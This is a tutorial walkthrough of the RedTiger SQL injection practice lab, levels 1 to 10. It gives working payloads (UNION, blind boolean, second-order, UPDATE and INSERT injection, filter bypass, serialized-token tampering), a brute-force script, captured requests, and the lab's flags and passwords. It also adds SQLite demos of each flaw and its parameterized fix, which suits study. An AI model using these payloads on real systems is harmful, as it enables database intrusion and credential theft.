Contents

  • Preface
  • 1. What is SQL injection?
  • 2. What is a lab?
  • 3. Finding the vulnerabilities
    • 1. The RedTiger lab
      • 1. Level 1
      • 2. Level 2
      • 3. Level 3
      • 4. Level 4
      • 5. Level 5
      • 6. Level 6
      • 7. Level 7
      • 8. Level 8
      • 9. Level 9
      • 10. Level 10
  • Summary

Preface

With security getting more and more national attention, I feel everyone should pick up at least the basics. Learning security starts with practice labs, so let's get to it.


1. What is SQL injection?

A SQL injection attack is one in which the attacker places SQL into a web form's input fields or into a page request's query string, tricking the server into executing attacker-supplied SQL. Forms where user input is used directly to build (or influence) a dynamic SQL statement, or is passed as a parameter to a stored procedure, are particularly exposed. (Two preconditions: 1. the user supplies input; 2. that input is executed as code.)

2. What is a lab?

Put simply, a practice environment where beginners can learn hands-on.

3. Finding the vulnerabilities

Let's start with the lab.


1. The RedTiger lab

Location: https://redtiger.labs.overthewire.org
Tools used: the HackBar browser extension; Ubuntu 20.04; phpStudy; PyCharm; Burp Suite

1. Level 1

Location: https://redtiger.labs.overthewire.org/level1.php
Steps:
1. Click "Category: 1".
2. Build the payload. The page already gives the table name, and the cat parameter is numeric, so no quote is needed; a four-column UNION goes through:

https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

3. The username and password show up in the rendered columns. Next level

2. Level 2

Location: https://redtiger.labs.overthewire.org/level2.php
Steps:
1. Enter the classic tautology in both the username and the password field:

1'or '1'='1

2. The password check in the source is presumably something like

password=''

3. With the payload spliced in, the condition is always true:

password='1'or '1'='1'

Next level

3. Level 3

Location: https://redtiger.labs.overthewire.org/level3.php
Steps:
1. Click "Admin".
2. In the URL bar, append [] to the usr parameter name and reload; handing the script an array where it expects a string makes it fail:

https://redtiger.labs.overthewire.org/level3.php?usr[]=MDQyMjExMDE0MTgyMTQw

3. The error message names the include that implements the parameter encoding; download it:

https://redtiger.labs.overthewire.org/urlcrypt.inc

4. Tidy the encoding function into a standalone .php file and run it under phpStudy to produce the encoded string for each payload. This has to run on Linux with a PHP 5.x build (I used Ubuntu 20.04): the function seeds rand() with a fixed value, and the sequence that seed produces depends on the C library and on the PHP version (PHP 7.1 and later alias rand() to mt_rand()), so only an environment matching the one the include was written for reproduces the lab's encoding.

<?php
// warning! ugly code ahead :)
// requires php5.x, sorry for that
// $str is the payload to encode
$str = "Admin' order by 7-- +";
$cryptedstr = "";
srand(3284724);
for ($i = 0; $i < strlen($str); $i++) {
    // XOR each byte with the next value of the seeded PRNG and zero-pad it to three digits
    $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);
    while (strlen($temp) < 3) {
        $temp = "0" . $temp;
    }
    $cryptedstr .= $temp . "";
}
echo base64_encode($cryptedstr);
?>

5. The Linux side looks like this:

root@ubuntu:/www/admin/localhost_80/wwwroot# ls
1.php  2.php  error
root@ubuntu:/www/admin/localhost_80/wwwroot# cat 2.php
<?php
// warning! ugly code ahead :)
// requires php5.x, sorry for that
// $str is the payload to encode
$str = "Admin' order by 6 -- +";
$cryptedstr = "";
srand(3284724);
for ($i = 0; $i < strlen($str); $i++) {
    $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);
    while (strlen($temp) < 3) {
        $temp = "0" . $temp;
    }
    $cryptedstr .= $temp . "";
}
echo base64_encode($cryptedstr);
?>
root@ubuntu:/www/admin/localhost_80/wwwroot#

6. Manual injection, finding the column count:

// first try 8 columns: encode, put the string into the URL, the page errors
$str = "Admin' order by 8 -- +"; ==> MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMxMDY1MTc2MDcxMDQ1MTky
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMxMDY1MTc2MDcxMDQ1MTky
// then 7 columns: no error, so the query has 7 columns
$str = "Admin' order by 7 -- +"; ==> MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY1MTc2MDcxMDQ1MTky
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY1MTc2MDcxMDQ1MTky

7. Manual injection, finding which of the seven columns are rendered and where:
Username: 2
First name: 6
Name: 7
ICQ: 5
Email: 4

//payload
$str = "1' union select 1,2,3,4,5,6,7 #"; ==> MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTA4MTUw
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTA4MTUw

8. Manual injection, reading the flag: put username in column 2 and password in column 6 (the First name field):

//payload
$str = "1' union select 1,username,3,4,5,password,7 from level3_users where username='Admin' #"; ==> MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDUyMjI3MDY1MTI3MjA4MDU5MjE5MTQzMDk0
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDUyMjI3MDY1MTI3MjA4MDU5MjE5MTQzMDk0

Username: Admin
First name:  thisisaverysecurepasswordEEE5rt

Next level

4. Level 4

Location: https://redtiger.labs.overthewire.org/level4.php
Steps:
1. The tautology payloads produce no error at all, whether in the username and password fields or in the URL.
2. Try sleep(5) in the URL to test for a time-based blind injection; the response is delayed, so the id parameter is injectable even though nothing is echoed:

https://redtiger.labs.overthewire.org/level4.php?id=1 and sleep(5)

3. The page does leak one bit of state, "Query returned 0 rows." versus "Query returned 1 rows.", so a boolean-based approach is faster than waiting on sleep(). Start by guessing the length of the secret:

// try 20 first: the page does not change, "Query returned 0 rows."
and (select length(keyword) from level4_secret limit 0,1)=20 #
// then 21: the page changes to "Query returned 1 rows.", so 21 is the length
and (select length(keyword) from level4_secret limit 0,1)=21 #
https://redtiger.labs.overthewire.org/level4.php?id=1%20and%20(select%20length(keyword)%20from%20level4_secret%20limit%200,1)=21%20#

4. Guess the value one character at a time:

// 107 (ASCII of 'k') first: the page changes to "Query returned 1 rows.", so k is the first character
and (ascii(substr((select keyword from level4_secret limit 0,1),1,1)))=107 #
https://redtiger.labs.overthewire.org/level4.php?id=1 and (ascii(substr((select keyword from level4_secret limit 0,1),1,1)))=107 #
// then 105 (ASCII of 'i') for position 2: "Query returned 1 rows.", so i is the second character
and (ascii(substr((select keyword from level4_secret limit 0,1),2,1)))=105 #
https://redtiger.labs.overthewire.org/level4.php?id=1 and (ascii(substr((select keyword from level4_secret limit 0,1),2,1)))=105 #

5. Write a script to run through the rest:

import requests
import time

base = "https://redtiger.labs.overthewire.org/level4.php"
# the level passwords the lab keeps in cookies; the request is not accepted without them
cookies = {
    'level2login': 'passwords_will_change_over_time_let_us_do_a_shitty_rhyme',
    'level3login': 'feed_the_cat_who_eats_your_bread',
    'level4login': 'put_the_kitten_on_your_head'
}
keyword = []
# the field length is 21
for pos in range(1, 22):
    # run through ASCII from '!' (33) up to, but not including, DEL (127)
    for num in range(33, 127):
        condition = "1 and (ascii(substr((select keyword from level4_secret limit 0,1)," + str(pos) + ",1)))=" + str(num) + " #"
        # send the condition as the id parameter so it is percent-encoded; appended raw to the URL,
        # the trailing '#' would be taken as a fragment and never reach the server
        target = requests.get(base, params={'id': condition}, cookies=cookies)
        if "Query returned 1 rows." in target.text:
            keyword.append(chr(num))
            print(chr(num))
            break
        time.sleep(1)
print(''.join(keyword))

6. Result: killstickswithbr1cks!
Next level

5. Level 5

Location: https://redtiger.labs.overthewire.org/level5.php
Steps:
1. Try the tautology in the username and password fields; it produces a warning:

1' or 1=1'
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/html/hackit/level5.php on line 46

2. The warning shows that the query failed (mysql_query() returned false) and that its result is then passed to mysql_num_rows(), so a guess at the login query is:

select username, password from table where username='xxx'

3. The submitted password is presumably md5()-hashed and compared with the password column of the row that came back. A UNION lets us decide what that row contains, so we can supply the hash ourselves:

username:' union select 1,md5(23)#
password:23
// anything works, as long as the value inside md5() equals the submitted password

Next level
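
Why the md5() trick logs in, as an added example that is not from the page: the login flow the page guesses, rebuilt on SQLite with MySQL's MD5() registered as a function so the payload runs unchanged (SQLite's `-- ` comment stands in for MySQL's `#`). The table contents and the exact query shape are assumptions, since the real level5.php source is not known; the fixed variant shows the bound-parameter version of the same lookup.

```python
import hashlib
import hmac
import sqlite3


def md5_hex(value):
    """MySQL's MD5() hashes the string form of its argument, so md5(23) == md5('23')."""
    return hashlib.md5(str(value).encode()).hexdigest()


def make_db():
    """Constructed stand-in for the level 5 table (assumed layout), with MD5() registered."""
    db = sqlite3.connect(":memory:")
    db.create_function("md5", 1, md5_hex)
    db.execute("CREATE TABLE level5_users(username TEXT, password TEXT)")
    db.execute("INSERT INTO level5_users VALUES ('admin', ?)",
               (md5_hex("correct horse battery"),))  # constructed row
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """The pattern the page guesses: username concatenated into the query, hash compared in PHP."""
    row = db.execute(
        f"SELECT username, password FROM level5_users WHERE username='{username}'"
    ).fetchone()
    if row is None:
        return None
    # The attacker controls BOTH sides of this comparison: the submitted password and,
    # through the UNION, the "stored" hash it is compared with.
    return row[0] if row[1] == md5_hex(password) else None


def login_fixed(db, username, password):
    """Bound parameter: the quote in the payload is data, so the UNION never becomes SQL."""
    row = db.execute(
        "SELECT username, password FROM level5_users WHERE username=?", (username,)
    ).fetchone()
    if row is None:
        return None
    return row[0] if hmac.compare_digest(row[1], md5_hex(password)) else None


# The page's payload, with SQLite's '-- ' comment in place of MySQL's '#'.
PAYLOAD_USERNAME = "' union select 1,md5(23)-- "
PAYLOAD_PASSWORD = "23"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))  # 1
    print("fixed:", login_fixed(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))            # None
```

The vulnerable path logs the attacker in as "user 1", the literal the UNION put into the username column; the stored hash was never consulted. Unsalted MD5 is a separate weakness, but the bypass here would work against any hash, because the comparison input is attacker-chosen.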

6. Level 6

Location: https://redtiger.labs.overthewire.org/level6.php
Steps:
1. Append a single quote after "user=1"; the error shows there is SQL injection.
2. Next comes order by:

// order by 1,2,3,4,5,6,7 errors
https://redtiger.labs.overthewire.org/level6.php?user=1 order by 1,2,3,4,5,6,7
// order by 1,2,3,4,5 does not error, so there are 5 columns

3. Standard procedure, find the displayed columns:

' union select 1,2,3,4,5
https://redtiger.labs.overthewire.org/level6.php?user=1' union select 1,2,3,4,5

4. The second column is displayed, which gives Username: admin (the user parameter is numeric, so the quote can be dropped, and user=0 makes the original row disappear):

' union select 1,username,3,4,5
http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,username,3,4,5 from level6_users where status = 1 #

5. Then try for the password:

http://redtiger.labs.overthewire.org/level6.php?user=1 union select 1,username,3,password,5 from level6_users where status = 1 #

6. Whichever column password is placed in, it never shows up, so the guess is a second-order injection:

// the developer's logic is probably: 1. look up the username by id; 2. look up username and email by that username. The injection therefore has to be staged for the second query.
// first statement
union select 1,username,3,4,5 from level6_users where status = 1 #
// second statement
union select 1,username,password,4,5 from level6_users where status=1 #
// splice them: replace username in the first with the whole second statement
union select 1,' union select 1,username,password,4,5 from level6_users where status=1 #,3,4,5 from level6_users where status = 1

7. That errors, because the quote inside the spliced statement terminates the outer string literal. Convert the second statement to a hex literal and try again:

// to maximise the chance of getting username and password out, I filled all 5 columns before converting to hex
' union select username,username,password,password,password from level6_users where status=1 #
// the hex form
0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023
// put that into the first statement. Note: no single quote after user=0; a 0x literal needs none
union select 1,0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023,3,4,5 from level6_users where status = 1
http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023,3,4,5 from level6_users where status = 1

8. Username and password come back (the password lands in the Email slot):

Username:   admin
Email:   m0nsterk1ll

9. Note: why is a second-order injection needed? Looking at it from the developer's side, the source is probably something like this:

// two SQL queries are run here; the user parameter is concatenated unquoted into the first,
// and the username read back from the first is concatenated into the second
$sql="select username,password from level6_users where id=".$_GET['user'];
$result=mysql_query($sql) or die('<pre>'.mysql_error().'</pre>');
$row=mysql_fetch_row($result);
$username=$row[0];
$sql2="select username,email from level6_users where username="."'".$username."'";

Next level
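
The second-order injection rebuilt on SQLite, as an added example that is not the lab's code. It follows the two-query reconstruction in step 9: the first query reads a row by numeric id, the second re-uses the username from that row inside a quoted literal, and only the second result is rendered. The table rows are constructed; MySQL's 0x<hex> literal is written as CAST(X'<hex>' AS TEXT) because SQLite has no 0x string literal; and since the reconstructed second query has two columns, the inner UNION selects two, whereas the page's payload filled five.

```python
import sqlite3


def make_db():
    """Constructed stand-in for level6_users (assumed layout); the admin password is the value the page recovered."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE level6_users(id INTEGER, username TEXT, password TEXT, email TEXT, status INTEGER)")
    db.executemany("INSERT INTO level6_users VALUES (?,?,?,?,?)", [
        (1, "admin", "m0nsterk1ll", "admin@example.test", 1),
        (2, "guest", "guest", "guest@example.test", 0),
    ])
    db.commit()
    return db


def profile_vulnerable(db, user_param):
    """Two-step lookup as the page reconstructs it: id -> username, then username -> (username, email).
    Only the second result is rendered, which is why a first-order UNION never shows the password."""
    row = db.execute(
        f"SELECT id, username, password, email, status FROM level6_users WHERE id={user_param}"
    ).fetchone()
    if row is None:
        return None
    username = row[1]  # came back from the database, so the application treats it as trusted...
    return db.execute(
        f"SELECT username, email FROM level6_users WHERE username='{username}'"  # ...and concatenates it
    ).fetchone()


def profile_fixed(db, user_param):
    """Both queries bound: data read back from the database is still data."""
    row = db.execute("SELECT username FROM level6_users WHERE id=?", (user_param,)).fetchone()
    if row is None:
        return None
    return db.execute("SELECT username, email FROM level6_users WHERE username=?", (row[0],)).fetchone()


# Step 5 on the page: password placed in a column of the first query. The first query does return
# it, but the page only renders the second query, which re-reads admin's real row by username.
FIRST_ORDER = "0 union select 1,username,3,password,5 from level6_users where status=1"

# Second-order payload: the text that lands in the username column is itself a fragment for the
# second SELECT (two columns: username, email). It is shipped as a hex literal so that its own quote
# and comment characters never appear literally in the outer query.
INNER = "' union select username,password from level6_users where status=1 -- "


def second_order_payload(inner=INNER):
    # MySQL would write 0x<hex>; SQLite spells the same idea as CAST(X'<hex>' AS TEXT)
    return f"0 union select 1,CAST(X'{inner.encode().hex()}' AS TEXT),3,4,5 from level6_users where status=1"


if __name__ == "__main__":
    db = make_db()
    print("first-order :", profile_vulnerable(db, FIRST_ORDER))             # ('admin', 'admin@example.test')
    print("second-order:", profile_vulnerable(db, second_order_payload()))  # ('admin', 'm0nsterk1ll')
    print("fixed       :", profile_fixed(db, second_order_payload()))       # None
```

The first-order attempt really does put the password into the first result set, but that row is only used to pick a username, so the page shows admin's genuine e-mail. The second-order payload turns the username column into the injection, and the password surfaces in the Email position, exactly as in step 8. Binding both queries closes the hole: the stored text then matches no username and the lookup returns nothing.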

7. Level 7

Location: https://redtiger.labs.overthewire.org/level7.php
Steps:
1. Enter a single quote in the search box; the page errors and leaks the whole query:

SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%'%' OR text.title LIKE '%'%')

2. Testing shows that comments are filtered (# is rejected) but the byte %a0 is not: MySQL also accepts 0xa0 in place of the space after "--", so "--%a0" gets through as a comment sequence the filter does not recognise, and %a0 can also replace ordinary spaces. The column count is found by trial, and the four-column UNION below goes through. Capture the request in Burp Suite and replay it from the Repeater:

//payload
POST /level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php HTTP/1.1
Host: redtiger.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://redtiger.labs.overthewire.org/level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://redtiger.labs.overthewire.org
Connection: close
Cookie: level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

search=1%') union select 1,2,3,4 --%a0&dosearch=search%21

3. The page shows columns 4 and 3 as the displayed positions. Swap in the real payload and replay the request:

POST /level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php HTTP/1.1
Host: redtiger.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://redtiger.labs.overthewire.org/level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://redtiger.labs.overthewire.org
Connection: close
Cookie: level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

search=google%') union select 1,2,3,autor from level7_news --%a0&dosearch=search%21

4. The response:

HTTP/1.1 200 OK
Date: Wed, 17 Mar 2021 08:15:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2906
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Welcome to Level 7</b><br><br>Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br><br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br><b>Google: The browser is the computer</b><br>SAN FRANCISCO--Google spent Wednesday morning trying to get developers excited about the next generation of Web technologies by showing off how future Web applications will mimic desktop apps."It's time for us to take advantage of the amazing opportunity that is before us," said Google CEO Eric Schmidt, kicking off Google I/O 2009 in San Francisco. Schmidt was referring to the growing sense that the Internet and browsers--rather than a computer's operating system--will be the future foundation for application development.The industry isn't quite ready for that yet. Many of applications demonstrated before the crowd of around 4,000 developers will require the widespread adoption of HTML 5 technologies, which are still under development by a consortium of companies and organizations.Still, Google's Vic Gundotra, vice president of engineering, noted that the four modern open-source browsers (Firefox, Safari, Chrome,and Opera) are all adopting some HTML 5 technologies as they become more stable, taking every opportunity possible to ding Microsoft's Internet Explorer for lagging behind the other four browsers.Gundotra showed off how Web applications will be able to take advantage of five main HTML 5 concepts: canvas tags, video tags, geolocation, application caching and database, and Web Workers.For example, canvas tags help developers bring all kinds of sophisticated graphics to their Web applications without having to use a plug-in--which is also the appeal of the video tag. 
Google showed off an "experiment" with YouTube videos coded using the video tags, which gives developers quite a few more options when it comes to how those videos can be embedded into a Web page.Geolocation is another huge topic of late with mobile applications. Google showed off how its Google Latitude application takes advantage of a new iPhone geolocation API that Apple will release as part of the iPhone 3.0 software to run in the mobile Safari browser. Mozilla's Jay Sullivan also showed off how Firefox 3.5 will come with a button that allows the browser to pinpoint your location in Google Maps using Wi-Fi and cell tower positioning data.<br><br><br><b>site_admin</b><br>3<br><br><br><b>press</b><br>3<br><br><br><b>TestUserforg00gle</b><br>3<br><br><br><b>apple</b><br>3<br><br><br><br><form method="post">Username: <input type="text" name="username"><br><input type="submit" name="try" value="Check!"></form><br>

5. Look closely at the response: after the article text, the UNION rows list every value of the autor column. Try each username in the check form and one of them passes. Next level

site_admin
press
TestUserforg00gle
apple

8. Level 8

Location: https://redtiger.labs.overthewire.org/level8.php
Steps:
1. A single quote in the Email field produces an error, so the form is injectable.
2. A single quote in the Name field just gives Username: Admin.
3. From the error, the source is presumably an UPDATE statement with the columns in the order name, email, icq, age:

update table_name set name = 'xxx', email = 'xxx', icq = 'xxx', age = xxx where id = 1

4. Build a payload that assigns password to name, so that the password is shown back on the page (MySQL evaluates the assignments left to right, so the later name = password wins):

',name = password,email = '
// spliced into the full statement this becomes
update table_name set name = ' ',name = password,email = ' ', email = 'xxx', icq = 'xxx', age = xxx where id = 1

5. The password is displayed in the Name field. Next level

9. Level 9

Location: https://redtiger.labs.overthewire.org/level9.php
Steps:
1. The submit form turns out to be injectable.
2. Try a UNION:

') union select 1,2,3,4,5 from level9_users --%0a

3. Nothing comes back, which makes sense once you know (as I later heard) that the form feeds an INSERT rather than a SELECT: there is no result set to display. The source is probably along the lines of:

printf("INSERT INTO listing (name, title, text) VALUES (%s,%s,%s)", $name,$title,$text);

4. So build a payload that closes the row being inserted and adds a second row whose values are subqueries:

'), ((select username from level9_users), (select password from level9_users), '
// restored into the source it reads like this:
INSERT INTO listing (name, title, text) VALUES ('','',''), ((select username from level9_users), (select password from level9_users), '')
// two rows are inserted; the second one carries the data we want to read

5. Result:

Autor: TheBlueFlower
Title: this_oassword_is_SEC//Ure.promised!

Last level
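
The INSERT payload rebuilt on SQLite, as an added example that is not the lab's source. The statement shape follows the printf() guess above, with the payload submitted in the last field (text) so that the quotes close exactly as in the reconstruction; the level9_users row is constructed and its password value is made up. The bound-parameter version shows what the same submission becomes when the fields are data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the level 9 tables (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE level9_users(username TEXT, password TEXT);
        INSERT INTO level9_users VALUES ('TheBlueFlower', 'constructed_secret');
        CREATE TABLE listing(name TEXT, title TEXT, text TEXT);
    """)
    return db


def post_vulnerable(db, name, title, text):
    """The INSERT the page reconstructs: three form fields dropped straight into VALUES (...)."""
    db.execute(f"INSERT INTO listing (name, title, text) VALUES ('{name}','{title}','{text}')")
    db.commit()
    return db.execute("SELECT name, title, text FROM listing").fetchall()


def post_fixed(db, name, title, text):
    """Bound parameters: the payload is stored as an inert string in a single row."""
    db.execute("INSERT INTO listing (name, title, text) VALUES (?,?,?)", (name, title, text))
    db.commit()
    return db.execute("SELECT name, title, text FROM listing").fetchall()


# Submitted in the LAST field (text): it closes the row the application was writing and opens a
# second one whose values are scalar subqueries, giving the statement from the page:
#   INSERT INTO listing (name, title, text) VALUES ('','',''), ((select username ...), (select password ...), '')
PAYLOAD = "'), ((select username from level9_users), (select password from level9_users), '"

if __name__ == "__main__":
    for row in post_vulnerable(make_db(), "", "", PAYLOAD):
        print(row)  # second row: ('TheBlueFlower', 'constructed_secret', '')
```

Nothing is "returned" by the injection itself; the secret is written into the listing as a new post, and reading it back is just viewing the listing, which is why the page shows it under Autor and Title.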

10. Level 10

Location: https://redtiger.labs.overthewire.org/level10.php
Steps:
1. The page has nothing but a button, so this one has to be tested through Burp Suite.
2. Start Burp, click the button, intercept the request and send it to the Repeater:

POST /level10.php HTTP/1.1
Host: redtiger.labs.overthewire.org
Connection: close
Content-Length: 112
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://redtiger.labs.overthewire.org
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://redtiger.labs.overthewire.org/level10.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,fr;q=0.5,fil;q=0.4
Cookie: __utma=176859643.967972366.1612269538.1612269538.1612269538.1; __utmz=176859643.1612269538.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold; level8login=or_so_i%27m_told; level9login=network_pancakes_milk_and_wine; level10login=whatever_just_a_fresh_password

login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login

3. Take the login value out of the original request body and decode it. From experience it is base64, and it decodes to a PHP serialized array:

//original
YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9
//decoded
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}

4. Change "Monkey" to "TheMaster", re-encode and send it:

//modified
a:2:{s:8:"username";s:6:"TheMaster";s:8:"password";s:12:"0815password";}
//encoded
YToyOntzOjg6InVzZXJuYW1lIjtzOjY6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9
//sent
login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login

5. That produces a deserialization error: unserialize() rejects the value because the length prefix still says 6 while "TheMaster" is 9 bytes, so the prefix has to become s:9. Looking at the "password" field, which is declared as a 12-byte string, try turning it into a boolean with value 1 at the same time:

//modified
a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}
//encoded
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
//sent
login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login

6. The page changes:

Welcome TheMaster.
You solved the hackit :)
You can raise your wechall.net score with this flag: 721ce43d433ad85bcfa56644b112fa52
The password for the hall of fame is: make_the_internet_great_again

7. Sign the hall of fame
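
Editing the serialized token by hand is error-prone because every string carries its own byte length, which is exactly what went wrong in step 4. The following added example (not from the post) decodes the login value, rewrites it with recomputed lengths and a boolean password, and re-encodes it; it implements only the subset of PHP's serialize() format that this token uses (bool, int, string, flat array), and assumes ASCII payloads so that byte offsets equal string offsets. Why a boolean passes is an assumption about level10.php's source, which the page does not show: the usual explanation is that the stored password is compared with PHP's loose ==, and in PHP true == "any non-empty string".

```python
import base64

# The login value captured in the request on the page (Monkey / 0815password), used as sample input.
ORIGINAL_LOGIN = "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9"


def php_serialize(value):
    """PHP serialize() for the subset this token uses: bool, int, str and flat arrays (dict).
    String lengths are byte counts, so the prefix is recomputed from the encoded value."""
    if isinstance(value, bool):  # must precede the int check: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
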